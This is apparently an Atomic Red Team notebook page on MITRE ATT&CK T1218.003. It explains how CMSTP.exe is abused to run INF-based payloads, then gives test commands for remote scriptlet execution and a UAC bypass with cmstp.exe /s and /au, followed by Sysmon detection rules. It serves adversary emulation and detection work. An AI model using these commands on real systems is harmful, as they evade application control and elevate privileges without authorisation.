# T1218.003 - Signed Binary Proxy Execution: CMSTP
Adversaries may abuse CMSTP to proxy execution of malicious code. The Microsoft Connection Manager Profile Installer (CMSTP.exe) is a command-line program used to install Connection Manager service profiles. (Citation: Microsoft Connection Manager Oct 2009) CMSTP.exe accepts an installation information file (INF) as a parameter and installs a service profile leveraged for remote access connections.

Adversaries may supply CMSTP.exe with INF files infected with malicious commands. (Citation: Twitter CMSTP Usage Jan 2018) Similar to [Regsvr32](https://attack.mitre.org/techniques/T1218/010) / ”Squiblydoo”, CMSTP.exe may be abused to load and execute DLLs (Citation: MSitPros CMSTP Aug 2017)  and/or COM scriptlets (SCT) from remote servers. (Citation: Twitter CMSTP Jan 2018) (Citation: GitHub Ultimate AppLocker Bypass List) (Citation: Endurant CMSTP July 2018) This execution may also bypass AppLocker and other application control defenses since CMSTP.exe is a legitimate, signed Microsoft application.

CMSTP.exe can also be abused to [Bypass User Access Control](https://attack.mitre.org/techniques/T1548/002) and execute arbitrary commands from a malicious INF through an auto-elevated COM interface. (Citation: MSitPros CMSTP Aug 2017) (Citation: GitHub Ultimate AppLocker Bypass List) (Citation: Endurant CMSTP July 2018)

## Atomic Tests

In [ ]:
#Import the Module before running the tests.
# Checkout Jupyter Notebook at https://github.com/cyb3rbuff/TheAtomicPlaybook to run PS scripts.
Import-Module /Users/0x6c/AtomicRedTeam/atomics/invoke-atomicredteam/Invoke-AtomicRedTeam.psd1 - Force

### Atomic Test #1 - CMSTP Executing Remote Scriptlet
Adversaries may supply CMSTP.exe with INF files infected with malicious commands

**Supported Platforms:** windows
#### Dependencies:  Run with `powershell`!
##### Description: INF file must exist on disk at specified location (#{inf_file_path})

##### Check Prereq Commands:
```powershell
if (Test-Path PathToAtomicsFolder\T1218.003\src\T1218.003.inf) {exit 0} else {exit 1}

```
##### Get Prereq Commands:
```powershell
New-Item -Type Directory (split-path PathToAtomicsFolder\T1218.003\src\T1218.003.inf) -ErrorAction ignore | Out-Null
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.003/src/T218.003.inf" -OutFile "PathToAtomicsFolder\T1218.003\src\T1218.003.inf"

```

In [ ]:
Invoke-AtomicTest T1218.003 -TestNumbers 1 -GetPreReqs

#### Attack Commands: Run with `command_prompt`
```command_prompt
cmstp.exe /s PathToAtomicsFolder\T1218.003\src\T1218.003.inf
```

In [ ]:
Invoke-AtomicTest T1218.003 -TestNumbers 1

### Atomic Test #2 - CMSTP Executing UAC Bypass
Adversaries may invoke cmd.exe (or other malicious commands) by embedding them in the RunPreSetupCommandsSection of an INF file

**Supported Platforms:** windows
#### Dependencies:  Run with `powershell`!
##### Description: INF file must exist on disk at specified location (#{inf_file_uac})

##### Check Prereq Commands:
```powershell
if (Test-Path PathToAtomicsFolder\T1218.003\src\T1218.003_uacbypass.inf) {exit 0} else {exit 1}

```
##### Get Prereq Commands:
```powershell
New-Item -Type Directory (split-path PathToAtomicsFolder\T1218.003\src\T1218.003_uacbypass.inf) -ErrorAction ignore | Out-Null
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.003/src/T1218.003_uacbypass.inf" -OutFile "PathToAtomicsFolder\T1218.003\src\T1218.003_uacbypass.inf"

```

In [ ]:
Invoke-AtomicTest T1218.003 -TestNumbers 2 -GetPreReqs

#### Attack Commands: Run with `command_prompt`
```command_prompt
cmstp.exe /s PathToAtomicsFolder\T1218.003\src\T1218.003_uacbypass.inf /au
```

In [ ]:
Invoke-AtomicTest T1218.003 -TestNumbers 2

## Detection
Use process monitoring to detect and analyze the execution and arguments of CMSTP.exe. Compare recent invocations of CMSTP.exe with prior history of known good arguments and loaded files to determine anomalous and potentially adversarial activity.

Sysmon events can also be used to identify potential abuses of CMSTP.exe. Detection strategy may depend on the specific adversary procedure, but potential rules include: (Citation: Endurant CMSTP July 2018)

* To detect loading and execution of local/remote payloads - Event 1 (Process creation) where ParentImage contains CMSTP.exe and/or Event 3 (Network connection) where Image contains CMSTP.exe and DestinationIP is external.
* To detect [Bypass User Access Control](https://attack.mitre.org/techniques/T1548/002) via an auto-elevated COM interface - Event 10 (ProcessAccess) where CallTrace contains CMLUA.dll and/or Event 12 or 13 (RegistryEvent) where TargetObject contains CMMGR32.exe. Also monitor for events, such as the creation of processes (Sysmon Event 1), that involve auto-elevated CMSTP COM interfaces such as CMSTPLUA (3E5FC7F9-9A51-4367-9063-A120244FBEC7) and CMLUAUTIL (3E000D72-A845-4CD9-BD83-80C07C3B881F).